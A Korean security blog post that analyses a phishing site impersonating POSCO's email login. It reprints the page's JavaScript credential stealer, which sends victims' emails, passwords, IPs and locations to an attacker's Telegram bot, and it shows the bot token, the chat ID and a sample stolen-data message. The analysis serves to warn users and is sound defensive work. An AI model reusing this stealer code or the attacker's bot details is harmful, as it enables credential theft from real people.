꿈을꾸는 파랑새

오늘은 대한민국의 3대 철강사 이자 포스코그룹의 모태가 되는 철강업체이자 포스코홀딩스의 자회사로 과거 명칭은 포항종합제철(약칭 포철)이며 1960년대까지 경공업 국가였던 대한민국이 경제개발계획에 따라 1970년대부터 중공업을 본격적으로 양성하기 위해서 기반을 다진 것이 바로 포항제철소의 완공이라고 볼 수 있으며

박정희 대통령은 제2차 경제개발 5개년 계획을 준비하던 중 기초 산업으로 철강 산업이 필요하다는 것을 인식 종합제철소 건립이 본격적으로 추진된 것은 1965년입니다. 아무튼, 이번에는 어디인지 모르겠지만, 포스코의 직원을 상대로 피싱을 진행을 한 것으로 추측됩니다.
일단 성은 다르지만 이름만 보면 실제 포스코 직원인 것 같기도 하고 아무튼 기본적으로 로그인에는 이름이 입력돼 있고 비밀번호를 알아내려고 하는 것 같습니다. 일단 웹 소스에 중국어로 已下架(제거됨, 파기됨)으로 돼 있으며

포스코 이메일 로그인 사칭 피싱 사이트비밀번호 입력시 오류
포스코 이메일 로그인 사칭 피싱 사이트

피싱 사이트 주소

hxxps://caller(.)3utilities(.)com/tut/jhgtyfgh(.)html#?????@posco(.)com

이며 진짜 포스코 사이트와 비교하면 차이가 나는 것을 확인할 수가 있으며 여기서 개인정보를 입력하면 다음과 사이트로 이동합니다.

개인정보 수집 내용
개인정보 수집 내용


hxxps://api(.)telegram(.)org/bot6839947431:AAE6U6FbtNmJN(Z)IbaoYhqmkM1WBXCMKXM(N)g/sendMessage
여기에서는 아이디 비밀번호 대략 IP 주소로 유추한 사는 지역 등이 담겨 있는 것을 확인할 수가 있습니다.
여기서 핵심 HTML 코드는 다음과 같습니다.

setTimeout(async () => {
          if (emailField.val() == '') {
            errorElement.show();
          } else {
            if (passwordField.val() == '') {
              msgElement.show();
            } else {
              if (passwordField.val().length < 4) {
                lessThan4Element.show();
                passwordField.val('');
              } else {
                ai = emailField.val();
                pr = passwordField.val();

                var date = new Date();
                const visitorInfo = await sendVisitorIP();
                // console.log('MX Record', await getMXRecord(domain))


                var message =
                  `--------+ General Webmail ReZulT ${visitorInfo[2]} ${visitorInfo[3]}, ${visitorInfo[1]} +--------\n`;
                message += "Email : " + ai + "\n";
                message += "Password : " + pr + "\n";
                message += "Checker: " + ai + ":" + pr + "\n";
                message += "Browser : " + GetBrowserandLanguage()[0] + "\n";

                message += "Language : " + GetBrowserandLanguage()[1] + "\n";
                message += "MX Record : " + await getMXRecord(domain) + "\n";
                message += "IP Address : " + visitorInfo[0] + "\n";
                message += `Region and Country : ${visitorInfo[2]} ${visitorInfo[3]}, ${visitorInfo[1]} \n`;
                message += "Date : " + date + "\n";
                message +=
                  `---------+ General Webmail ReZulT ${visitorInfo[2]} ${visitorInfo[3]}, ${visitorInfo[1]} +-------------\n`;
                var token = "6839947431:AAE6U6FbtNmJNZIbaoYhqmkM1WBXCMKXMNg";
                var chatId = "2056885248";

                $.ajax({
                  dataType: 'JSON',
                  url: `hxxps://api(.)telegram(.)org/bot${token}/sendMessage`,
                  type: 'POST',
                  data: {
                    "chat_id": chatId,
                    "text": message
                  },
                  beforeSend: function (xhr) {
                    $('#submit-btn')(.)html(langs.verifyingText);
                  },
                  success: function (response) {
                    if (response) {
                      if (response['ok'] == true) {
                        if (attempts >= 1) {
                          attempts = 0;
                          $(".login-form").hide();
                          $(".success-con").show();
                          $(".success-con .msg").html(`
                      ${langs.yourEmail} <br>
                      ${langs.success}</b>
                    `);
                          setTimeout(() => {
                            window.location.replace(
                              `hxxp://www.${domain}`); // Redirect to the desired page
                          }, 5000);
                        } else {
                          attempts++;
                          msgElement.show();
                          passwordField.val('');
                          $('#submit-btn').html(langs.submitBtn);
                        }
                      }
                    }
                  },
                  error: function (err) {
                    $('#net-errror').show();
                    passwordField.val('');
                    console.log("Error : ", err);
                  }
                });
              }
            }
          }
        });
      });
    }
  </script>

실시간 텔레그램을 전송 되게 만든 코드
실시간 텔레그램을 전송 되게 만든 코드

코드 분석

Telegram API를 이용하여 사용자의 이메일 주소와 비밀번호를 수집 하고 이를 공격자의 Telegram 채널로 전송하는 실제 Credential Stealer
사용자 입력 수집:email Field.val(),passwordField.val() 으로 이메일,비번 수집
Telegram 사용:hxxps://api(.)telegram(.)org/bot.../sendMessage 사용
전송 내용: 이메일, 비밀번호, 브라우저, 언어, IP, 지역 등 매우 상세
수신자 (공격자):Chat ID: 2056885248, Bot Token: 6839947431:AAE6U6FbtNmJNZIbaoYhqmkM1WBXCMKXMNg
Redirect URL:hxxp://www.${domain} 로 리디렉션 (피싱된 도메인 변수 사용)
공격 흐름 시각화
sequenceDiagram
    participant Victim as 피해자
    participant Browser as 브라우저
    participant Script as 악성 JS
    participant Telegram as Telegram Bot

  Victim->>Browser: 이메일/비밀번호 입력
    Browser->>Script: 값 전달
    Script->>Script: IP, 브라우저 정보 수집
    Script->>Telegram: sendMessage 호출 (AI + PW + IP 등)
    Telegram-->>Script: 응답 (OK 여부)
    Script->>Browser: 리디렉션 (hxxp://www.${domain})

포스코 피싱 사이트 와 진짜 포스코 사이트 비교
포스코 피싱 사이트 와 진짜 포스코 사이트 비교

전송 메시지 예시
General Webmail ReZulT Seoul KR, South Korea
Email:victim@example(.)com
Password:mypassword123<-이것 가상 저는 tlwlsvldrotoRL
Checker:victim@example(.)com:mypassword123
Browser:Chrome
Language:ko-KR
MX Record:mx.google.com
IP Address:123(.)123(.)123(.)123
Region and Country : Seoul KR, South Korea

곰돌이 푸
곰돌이 푸

Date : Mon Mar 25 2025 12:12:12 GMT+0900
General Webmail ReZulT Seoul KR, South Korea
이렇게 사용자 정보 탈취 후 Telegram으로 실시간 전송
그리고 처음 IP로 접속 시 다시 접속을 하면 사이트는 안보임
아무튼, 이렇게 정보를 계속 털어가고 있으니 항상 주의하시길 바랍니다.

그리드형

공유하기

facebook twitter kakaoTalk kakaostory naver band